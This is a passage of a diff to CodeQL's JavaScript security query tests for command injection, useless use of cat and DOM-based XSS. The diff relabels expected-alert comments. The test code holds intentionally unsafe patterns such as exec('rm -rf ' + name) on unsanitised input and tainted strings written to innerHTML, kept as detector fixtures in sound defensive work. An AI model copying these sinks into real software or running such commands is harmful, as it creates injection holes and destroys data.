exec("rm -rf " + name); // $ Alert } else { - exec("rm -rf " + name); // NOT OK + exec("rm -rf " + name); // $ Alert } if (!name.match(/^\w{1,64}$/)) { // <- good sanitizer - exec("rm -rf " + name); // NOT OK + exec("rm -rf " + name); // $ Alert } else { - exec("rm -rf " + name); // OK + exec("rm -rf " + name); } } module.exports.safeWithBool = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (isSafeName(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (isSafeName(name) === true) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isSafeName(name) !== false) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isSafeName(name) == false) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } function indirectThing(name) { @@ -606,36 +606,36 @@ function moreIndirect(name) { } module.exports.veryIndeirect = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (indirectThing(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (indirectThing2(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (moreIndirect(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (moreIndirect(name) !== false) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } module.exports.sanitizer = function (name) { var sanitized = "'" + name.replace(new RegExp("\'"), "'\\''") + "'" - cp.exec("rm -rf " + sanitized); // NOT OK + cp.exec("rm -rf " + sanitized); // $ Alert var sanitized = "'" + name.replace(new RegExp("\'", 'g'), "'\\''") + "'" - cp.exec("rm -rf " + sanitized); // OK + cp.exec("rm -rf " + sanitized); var sanitized = "'" + name.replace(new RegExp("\'", unknownFlags()), "'\\''") + "'" - cp.exec("rm -rf " + sanitized); // OK -- Most likely should be okay and not flagged to reduce false positives. + cp.exec("rm -rf " + sanitized); // OK - Most likely should be okay and not flagged to reduce false positives. } diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js index db1ecd02413f..6dc040fd7800 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js @@ -1,9 +1,9 @@ var cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - is imported from main module. + cp.exec("rm -rf " + name); // $ Alert - is imported from main module. }; module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // NOT OK - is imported from main module. + cp.exec("rm -rf " + name); // $ Alert - is imported from main module. }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/other.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/other.js index b107ac03d7ae..1f512e8c3817 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/other.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/other.js @@ -1,5 +1,5 @@ var cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // OK, is not exported to a main-module. + cp.exec("rm -rf " + name); // OK - is not exported to a main-module. }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js index a594c2182392..df2b9bd82e60 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js @@ -1,5 +1,5 @@ const cp = require("child_process"); module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - this function is exported from `amd.js` + cp.exec("rm -rf " + name); // $ Alert - this function is exported from `amd.js` }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js index 6e7d3498723d..ba4bd7089693 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js @@ -1,15 +1,15 @@ var cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged. + cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged. }; module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // NOT OK - this is being called explicitly from child_process-test.js + cp.exec("rm -rf " + name); // $ Alert - this is being called explicitly from child_process-test.js }; module.exports.amd = require("./amd.js"); module.exports.arrToShell = function (cmd, arr) { - cp.spawn("echo", arr, {shell: true}); // NOT OK + cp.spawn("echo", arr, {shell: true}); // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts index 1e945f15e724..f2e6b7672f89 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts @@ -1,5 +1,5 @@ var cp = require("child_process") export default function (name) { - cp.exec("rm -rf " + name); // NOT OK - the "files" directory points to this file. + cp.exec("rm -rf " + name); // $ Alert - the "files" directory points to this file. } diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js index c46fed331815..67890f50fe82 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js @@ -1,5 +1,5 @@ var cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - the "files" directory points to this file. + cp.exec("rm -rf " + name); // $ Alert - the "files" directory points to this file. }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts index 9fa88413cc88..8a79d2d66a66 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts @@ -1,5 +1,5 @@ var cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged. + cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged. }; diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js index 952288a82cef..bc9e51562033 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js @@ -1,5 +1,5 @@ const cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged. + cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged. }; diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/uselesscat.js b/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/uselesscat.js index 9654b26dec03..d5230dab17f5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/uselesscat.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/uselesscat.js @@ -7,21 +7,21 @@ var spawnSync = child_process.spawnSync; var fs = require('fs'); var app = express(); -exec("cat foo/bar", function (err, out) {}); // NOT OK +exec("cat foo/bar", function (err, out) {}); // $ Alert -exec("cat /proc/" + id + "/status", function (err, out) { // NOT OK +exec("cat /proc/" + id + "/status", function (err, out) { // $ Alert console.log(out); }); -execSync('cat /proc/cpuinfo').toString(); // NOT OK. +execSync('cat /proc/cpuinfo').toString(); // $ Alert -execSync(`cat ${newpath}`) // NOT OK +execSync(`cat ${newpath}`) // $ Alert execSync('cat package.json | wc -l'); // OK - pipes! -execSync('cat /proc/cpuinfo /foo/bar').toString(); // OK multiple files. +execSync('cat /proc/cpuinfo /foo/bar').toString(); // OK - multiple files. -execSync(`cat ${newpath} /foo/bar`).toString(); // OK multiple files. +execSync(`cat ${newpath} /foo/bar`).toString(); // OK - multiple files. exec(`cat ${newpath} | grep foo`, function (err, out) { }) // OK - pipes @@ -29,73 +29,73 @@ execSync(`cat ${newpath}`, {uid: 1000}) // OK - non trivial options exec('cat *.js | wc -l', { cwd: './' }, function (err, out) { }); // OK - wildcard and pipes -execSync(`cat foo/bar/${newpath}`); // NOT OK ("encoding" is used EXACTLY the same way in fs.readFileSync) +execSync(`cat foo/bar/${newpath}`); // $ Alert - "encoding" is used EXACTLY the same way in fs.readFileSync -execSync(`cat foo/bar/${newpath}`, {encoding: 'utf8'}); // NOT OK ("encoding" is used EXACTLY the same way in fs.readFileSync) +execSync(`cat foo/bar/${newpath}`, {encoding: 'utf8'}); // $ Alert - "encoding" is used EXACTLY the same way in fs.readFileSync -execSync("/bin/cat /proc/cpuinfo", { uid: 1000, gid: 1000, encoding: 'utf8'}); // OK (fs.readFileSync cannot emulate uid / gid)) +execSync("/bin/cat /proc/cpuinfo", { uid: 1000, gid: 1000, encoding: 'utf8'}); // OK - (fs.readFileSync cannot emulate uid / gid)) -execSync('cat /proc/cpuinfo > foo/bar/baz').toString(); // OK. +execSync('cat /proc/cpuinfo > foo/bar/baz').toString(); -execSync(`cat ${newpath} > ${destpath}`).toString(); // OK. +execSync(`cat ${newpath} > ${destpath}`).toString(); -execSync(`cat ${files.join(' ')} > ${outFile}`); // OK +execSync(`cat ${files.join(' ')} > ${outFile}`); -execSync(`cat ${files.join(' ')}`); // OK - but flagged - not just a simple file read [INCONSISTENCY] +execSync(`cat ${files.join(' ')}`); // $ SPURIOUS: Alert - - but flagged - not just a simple file read exec("cat /proc/cpuinfo | grep name"); // OK - pipes execSync(`cat ${newpath} | ${othertool}`); // OK - pipes function cat(file) { - return execSync('cat ' + file).toString(); // NOT OK + return execSync('cat ' + file).toString(); // $ Alert } -execSync("sh -c 'cat " + newpath + "'"); // NOT OK - but not flagged [INCONSISTENCY] +execSync("sh -c 'cat " + newpath + "'"); // $ MISSING: Alert var execFile = child_process.execFile; var execFileSync = child_process.execFileSync; -execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // NOT OK +execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // $ Alert // Not using stderr console.log(stdout); }); -execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // OK. - stderr is used. +execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // OK - - stderr is used. console.log(stderr); }); -execFile('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}, function(error, stdout, stderr ) { // NOT OK +execFile('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}, function(error, stdout, stderr ) { // $ Alert // Not using stderr console.log(stdout); }); -execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}); // $ Alert -execFileSync('/bin/cat', [ 'pom.xml' ]); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ]); // $ Alert var opts = {encoding: 'utf8'}; -execFileSync('/bin/cat', [ 'pom.xml' ], opts); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ], opts); // $ Alert var anOptsFileNameThatIsTooLongToBePrintedByToString = {encoding: 'utf8'}; -execFileSync('/bin/cat', [ 'pom.xml' ], anOptsFileNameThatIsTooLongToBePrintedByToString); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ], anOptsFileNameThatIsTooLongToBePrintedByToString); // $ Alert -execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'someEncodingValueThatIsCompletelyBogusAndTooLongForToString'}); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'someEncodingValueThatIsCompletelyBogusAndTooLongForToString'}); // $ Alert -execFileSync('/bin/cat', [ "foo/" + newPath + "bar" ], {encoding: 'utf8'}); // NOT OK +execFileSync('/bin/cat', [ "foo/" + newPath + "bar" ], {encoding: 'utf8'}); // $ Alert -execSync('cat /proc/cpuinfo' + foo).toString(); // NOT OK. +execSync('cat /proc/cpuinfo' + foo).toString(); // $ Alert -execFileSync('/bin/cat', [ `foo/bar/${newpath}` ]); // NOT OK +execFileSync('/bin/cat', [ `foo/bar/${newpath}` ]); // $ Alert execFileSync('node', [ `foo/bar/${newpath}` ]); // OK - not a call to cat -exec("cat foo/bar", function (err, out) {}); // NOT OK +exec("cat foo/bar", function (err, out) {}); // $ Alert -exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK +exec("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert -exec("cat foo/bar", (err, out) => doSomethingWith(out)); // NOT OK +exec("cat foo/bar", (err, out) => doSomethingWith(out)); // $ Alert execFileSync('/bin/cat', [ 'pom.xml' ], unknownOptions); // OK - unknown options. @@ -118,13 +118,13 @@ spawn('cat', { stdio: ['pipe', stdin, 'inherit'] }); // OK - Non trivial use. (B cat.stdout.on('end', () => res.end()); })(); -var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK +var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert -var notDead = exec("cat foo/bar", (err, out) => {console.log(out)}); // OK +var notDead = exec("cat foo/bar", (err, out) => {console.log(out)}); console.log(notDead); (function () { - var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK + var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert someCall( exec("cat foo/bar", (err, out) => {console.log(out)}) // OK - non-trivial use of returned proccess. @@ -133,34 +133,34 @@ console.log(notDead); return exec("cat foo/bar", (err, out) => {console.log(out)}); // OK - non-trivial use of returned proccess. })(); -const stdout2 = execSync('cat /etc/dnsmasq.conf', { // NOT OK. +const stdout2 = execSync('cat /etc/dnsmasq.conf', { // $ Alert encoding: 'utf8' }); -exec('/bin/cat', function (e, s) {}); // OK +exec('/bin/cat', function (e, s) {}); -spawn("cat") // OK +spawn("cat") var shelljs = require("shelljs"); -shelljs.exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK -shelljs.exec("cat foo/bar", {encoding: 'utf8'}); // NOT OK -shelljs.exec("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // NOT OK +shelljs.exec("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert +shelljs.exec("cat foo/bar", {encoding: 'utf8'}); // $ Alert +shelljs.exec("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // $ Alert let cspawn = require('cross-spawn'); -cspawn('cat', ['foo/bar'], { encoding: 'utf8' }); // NOT OK -cspawn('cat', ['foo/bar'], { encoding: 'utf8' }, (err, out) => {console.log(out)}); // NOT OK -cspawn('cat', ['foo/bar'], (err, out) => {console.log(out)}); // NOT OK -cspawn('cat', ['foo/bar']); // NOT OK -cspawn('cat', (err, out) => {console.log(out)}); // OK -cspawn('cat', { encoding: 'utf8' }); // OK +cspawn('cat', ['foo/bar'], { encoding: 'utf8' }); // $ Alert +cspawn('cat', ['foo/bar'], { encoding: 'utf8' }, (err, out) => {console.log(out)}); // $ Alert +cspawn('cat', ['foo/bar'], (err, out) => {console.log(out)}); // $ Alert +cspawn('cat', ['foo/bar']); // $ Alert +cspawn('cat', (err, out) => {console.log(out)}); +cspawn('cat', { encoding: 'utf8' }); -let myResult = cspawn.sync('cat', ['foo/bar']); // NOT OK -let myResult = cspawn.sync('cat', ['foo/bar'], { encoding: 'utf8' }); // NOT OK +let myResult = cspawn.sync('cat', ['foo/bar']); // $ Alert +let myResult = cspawn.sync('cat', ['foo/bar'], { encoding: 'utf8' }); // $ Alert var execmod = require('exec'); -execmod("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK -execmod("cat foo/bar", {encoding: 'utf8'}); // NOT OK -execmod("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // NOT OK +execmod("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert +execmod("cat foo/bar", {encoding: 'utf8'}); // $ Alert +execmod("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js index 97d21371d082..8d4a8cac6d0a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js @@ -1,16 +1,16 @@ this.addEventListener('message', function(event) { - document.write(event.data); // NOT OK + document.write(event.data); // $ Alert }) this.addEventListener('message', function({data}) { - document.write(data); // NOT OK + document.write(data); // $ Alert }) function test() { function foo(x, event, y) { - document.write(x.data); // OK - document.write(event.data); // NOT OK - document.write(y.data); // OK + document.write(x.data); + document.write(event.data); // $ Alert + document.write(y.data); } window.addEventListener("message", foo.bind(null, {data: 'items'})); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js index 37d3388ee784..1b186b7db6a4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js @@ -1,12 +1,12 @@ angular.module('myApp', []) .directive('myCustomer', function() { return { - templateUrl: "SAFE" // OK + templateUrl: "SAFE" } }) .directive('myCustomer', function() { return { - templateUrl: Cookie.get("unsafe") // NOT OK + templateUrl: Cookie.get("unsafe") // $ Alert } }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular2-client.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular2-client.ts index 6d1823c2f601..66cde9439328 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular2-client.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular2-client.ts @@ -21,29 +21,29 @@ export class AppComponent implements OnInit { ) {} ngOnInit() { - this.sanitizer.bypassSecurityTrustHtml(ɵgetDOM().getLocation().href); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(ɵgetDOM().getLocation().href); // $ Alert - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.params.foo); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.queryParams.foo); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.fragment); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.paramMap.get('foo')); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.queryParamMap.get('foo')); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.params.foo); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.queryParams.foo); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.fragment); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.paramMap.get('foo')); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.queryParamMap.get('foo')); // $ Alert this.route.paramMap.subscribe(map => { - this.sanitizer.bypassSecurityTrustHtml(map.get('foo')); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(map.get('foo')); // $ Alert }); - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].path); // NOT OK - though depends on route config - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameters.x); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameterMap.get('x')); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameterMap.params.x); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].path); // $ Alert - though depends on route config + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameters.x); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameterMap.get('x')); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameterMap.params.x); // $ Alert - this.sanitizer.bypassSecurityTrustHtml(this.router.url); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(this.router.url); // $ Alert - this.sanitizer2.bypassSecurityTrustHtml(this.router.url); // NOT OK - this.renderer.setProperty(this.document.documentElement, 'innerHTML', this.route.snapshot.queryParams.foo); // NOT OK + this.sanitizer2.bypassSecurityTrustHtml(this.router.url); // $ Alert + this.renderer.setProperty(this.document.documentElement, 'innerHTML', this.route.snapshot.queryParams.foo); // $ Alert } someMethod(routeSnapshot: ActivatedRouteSnapshot) { - this.sanitizer.bypassSecurityTrustHtml(routeSnapshot.paramMap.get('foo')); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(routeSnapshot.paramMap.get('foo')); // $ Alert } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js index a0e75045a2eb..8cda29a4e952 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js @@ -4,15 +4,15 @@ import classNamesB from 'classnames/bind'; import clsx from 'clsx'; function main() { - document.body.innerHTML = `Hello`; // NOT OK - document.body.innerHTML = `Hello`; // NOT OK - document.body.innerHTML = `Hello`; // NOT OK + document.body.innerHTML = `Hello`; // $ Alert + document.body.innerHTML = `Hello`; // $ Alert + document.body.innerHTML = `Hello`; // $ Alert let unsafeStyle = classNames.bind({foo: window.name}); - document.body.innerHTML = `Hello`; // NOT OK + document.body.innerHTML = `Hello`; // $ Alert let safeStyle = classNames.bind({}); - document.body.innerHTML = `Hello`; // NOT OK - document.body.innerHTML = `Hello`; // OK - document.body.innerHTML = `Hello`; // NOT OK + document.body.innerHTML = `Hello`; // $ Alert + document.body.innerHTML = `Hello`; + document.body.innerHTML = `Hello`; // $ Alert - document.body.innerHTML += `Hello`; // NOT OK + document.body.innerHTML += `Hello`; // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts index b87d5a43beea..161a1d6bdd82 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts @@ -12,7 +12,7 @@ function paste(e) { const div = document.createElement('div'); if (html) { - div.innerHTML = html; // NOT OK + div.innerHTML = html; // $ Alert } else { div.textContent = text; } @@ -21,16 +21,16 @@ function paste(e) { export function install(el: HTMLElement): void { el.addEventListener('paste', (e) => { - $("#id").html(e.clipboardData.getData('text/html')); // NOT OK + $("#id").html(e.clipboardData.getData('text/html')); // $ Alert }) } document.addEventListener('paste', (e) => { - $("#id").html(e.clipboardData.getData('text/html')); // NOT OK + $("#id").html(e.clipboardData.getData('text/html')); // $ Alert }); $("#foo").bind('paste', (e) => { - $("#id").html(e.originalEvent.clipboardData.getData('text/html')); // NOT OK + $("#id").html(e.originalEvent.clipboardData.getData('text/html')); // $ Alert }); (function () { @@ -47,7 +47,7 @@ $("#foo").bind('paste', (e) => { const div = document.createElement('div'); if (html) { - div.innerHTML = html; // NOT OK + div.innerHTML = html; // $ Alert } else { div.textContent = text; } @@ -96,6 +96,6 @@ async function getClipboardData(e: ClipboardEvent): Promise if (!dataTransfer) return; const html = dataTransfer.getData('text/html'); - $("#id").html(html); // NOT OK + $("#id").html(html); // $ Alert }); })(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/custom-element.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/custom-element.js index 9177f08bdc5c..dfa55453917a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/custom-element.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/custom-element.js @@ -2,6 +2,6 @@ import * as dummy from 'dummy'; class CustomElm extends HTMLElement { test() { - this.innerHTML = window.name; // NOT OK + this.innerHTML = window.name; // $ Alert } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js index 1bb64b48b214..c84f169995cb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js @@ -8,15 +8,15 @@ function doSomething() { d3.select('#main') .attr('width', 100) .style('color', 'red') - .html(getTaint()) // NOT OK - .html(d => getTaint()) // NOT OK + .html(getTaint()) // $ Alert + .html(d => getTaint()) // $ Alert .call(otherFunction) - .html(d => getTaint()); // NOT OK + .html(d => getTaint()); // $ Alert } function otherFunction(selection) { selection .attr('foo', 'bar') - .html(getTaint()); // NOT OK + .html(getTaint()); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js index 47513c796d96..97363f790da1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js @@ -8,17 +8,17 @@ function main() { let time = new Date(); let taint = decodeURIComponent(window.location.hash.substring(1)); - document.body.innerHTML = `Time is ${dateFns.format(time, taint)}`; // NOT OK - document.body.innerHTML = `Time is ${dateFnsEsm.format(time, taint)}`; // NOT OK - document.body.innerHTML = `Time is ${dateFnsFp.format(taint)(time)}`; // NOT OK + document.body.innerHTML = `Time is ${dateFns.format(time, taint)}`; // $ Alert + document.body.innerHTML = `Time is ${dateFnsEsm.format(time, taint)}`; // $ Alert + document.body.innerHTML = `Time is ${dateFnsFp.format(taint)(time)}`; // $ Alert document.body.innerHTML = `Time is ${dateFns.format(taint, time)}`; // OK - time arg is safe document.body.innerHTML = `Time is ${dateFnsFp.format(time)(taint)}`; // OK - time arg is safe - document.body.innerHTML = `Time is ${moment(time).format(taint)}`; // NOT OK - document.body.innerHTML = `Time is ${moment(taint).format()}`; // OK - document.body.innerHTML = `Time is ${dateformat(time, taint)}`; // NOT OK + document.body.innerHTML = `Time is ${moment(time).format(taint)}`; // $ Alert + document.body.innerHTML = `Time is ${moment(taint).format()}`; + document.body.innerHTML = `Time is ${dateformat(time, taint)}`; // $ Alert import dayjs from 'dayjs'; - document.body.innerHTML = `Time is ${dayjs(time).format(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${dayjs(time).format(taint)}`; // $ Alert } import LuxonAdapter from "@date-io/luxon"; @@ -34,10 +34,10 @@ function dateio() { const moment = new MomentAdapter(); const dayjs = new DayJSAdapter(); - document.body.innerHTML = `Time is ${dateFns.formatByString(new Date(), taint)}`; // NOT OK - document.body.innerHTML = `Time is ${luxon.formatByString(luxon.date(), taint)}`; // NOT OK - document.body.innerHTML = `Time is ${moment.formatByString(moment.date(), taint)}`; // NOT OK - document.body.innerHTML = `Time is ${dayjs.formatByString(dayjs.date(), taint)}`; // NOT OK + document.body.innerHTML = `Time is ${dateFns.formatByString(new Date(), taint)}`; // $ Alert + document.body.innerHTML = `Time is ${luxon.formatByString(luxon.date(), taint)}`; // $ Alert + document.body.innerHTML = `Time is ${moment.formatByString(moment.date(), taint)}`; // $ Alert + document.body.innerHTML = `Time is ${dayjs.formatByString(dayjs.date(), taint)}`; // $ Alert } import { DateTime } from "luxon"; @@ -45,18 +45,18 @@ import { DateTime } from "luxon"; function luxon() { let taint = decodeURIComponent(window.location.hash.substring(1)); - document.body.innerHTML = `Time is ${DateTime.now().plus({years: 1}).toFormat(taint)}`; // NOT OK - document.body.innerHTML = `Time is ${new DateTime().setLocale('fr').toFormat(taint)}`; // NOT OK - document.body.innerHTML = `Time is 